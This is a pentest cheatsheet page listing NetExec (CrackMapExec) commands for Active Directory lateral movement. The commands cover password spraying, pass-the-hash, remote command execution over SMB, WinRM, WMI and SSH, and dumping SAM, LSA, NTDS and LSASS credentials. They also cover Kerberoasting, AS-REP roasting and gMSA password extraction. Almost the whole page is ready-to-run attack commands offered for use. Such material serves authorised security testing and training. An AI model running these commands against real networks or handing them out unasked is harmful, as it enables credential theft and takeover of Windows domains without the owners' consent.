← All Cheatsheets

active-directory

NetExec (CrackMapExec) — AD Lateral Movement

NetExec (nxc) — the Swiss Army knife for Windows/AD lateral movement, credential spraying, and post-exploitation.

18 views Apr 2026 lazyhackers

SMB Enumeration & Auth (11)

nxc smb 192.168.1.0/24

Discover SMB hosts on subnet

smb discovery

nxc smb 10.10.10.1 -u user -p password

Test SMB credentials

smb auth

nxc smb 10.10.10.1 -u user -H NTLMhash

SMB pass-the-hash

smb pth

nxc smb 192.168.1.0/24 -u user -p password

Spray credentials across subnet

smb spray

nxc smb 10.10.10.1 -u users.txt -p passwords.txt --continue-on-success

Credential spray with lists

smb spray

nxc smb 10.10.10.1 -u user -p password --shares

Enumerate SMB shares

smb shares enum

nxc smb 10.10.10.1 -u user -p password --sessions

List active SMB sessions

smb sessions

nxc smb 10.10.10.1 -u user -p password --users

Enumerate domain users via SMB

smb users enum

nxc smb 10.10.10.1 -u user -p password --groups

Enumerate domain groups

smb groups enum

nxc smb 10.10.10.1 -u user -p password --pass-pol

Get password policy

smb policy

nxc smb 10.10.10.1 -u user -p password --rid-brute

RID brute force to enumerate users/groups

smb rid enum

Code Execution (4)

nxc smb 10.10.10.1 -u user -p password -x "whoami"

Execute command via SMB

smb exec cmd

nxc smb 10.10.10.1 -u user -p password -X "Get-Process"

Execute PowerShell command

smb exec powershell

nxc winrm 10.10.10.1 -u user -p password -x "whoami"

Execute via WinRM (PS Remoting)

winrm exec

nxc wmi 10.10.10.1 -u user -p password -x "whoami"

Execute via WMI

wmi exec

Credential Dumping (5)

nxc smb 10.10.10.1 -u user -p password --sam

Dump SAM hashes (local admin needed)

sam dump creds

nxc smb 10.10.10.1 -u user -p password --lsa

Dump LSA secrets

lsa dump creds

nxc smb 10.10.10.1 -u user -p password --ntds

DCSync — dump NTDS.dit (DA needed)

ntds dcsync dump

nxc smb 10.10.10.1 -u user -p password -M mimikatz

Run Mimikatz module

mimikatz creds

nxc smb 10.10.10.1 -u user -p password -M lsassy

LSASS dump with lsassy module

lsassy lsass dump

LDAP & Other Protocols (8)

nxc ldap 10.10.10.1 -u user -p password --asreproast asrep.txt

AS-REP Roasting via LDAP

ldap asrep kerberos

nxc ldap 10.10.10.1 -u user -p password --kerberoasting kerb.txt

Kerberoasting via LDAP

ldap kerberoast kerberos

nxc ldap 10.10.10.1 -u user -p password --bloodhound -ns 10.10.10.1 -c All

Collect BloodHound data via LDAP

ldap bloodhound

nxc ldap 10.10.10.1 -u user -p password --gmsa

Dump gMSA passwords

ldap gmsa

nxc mssql 10.10.10.1 -u sa -p password -q "SELECT @@version"

MSSQL query execution

mssql sql

nxc mssql 10.10.10.1 -u sa -p password --local-auth

MSSQL with local auth

mssql local-auth

nxc ssh 10.10.10.1 -u user -p password -x "id"

SSH command execution

ssh exec

nxc rdp 192.168.1.0/24 -u user -p password

Test RDP credentials on subnet

rdp spray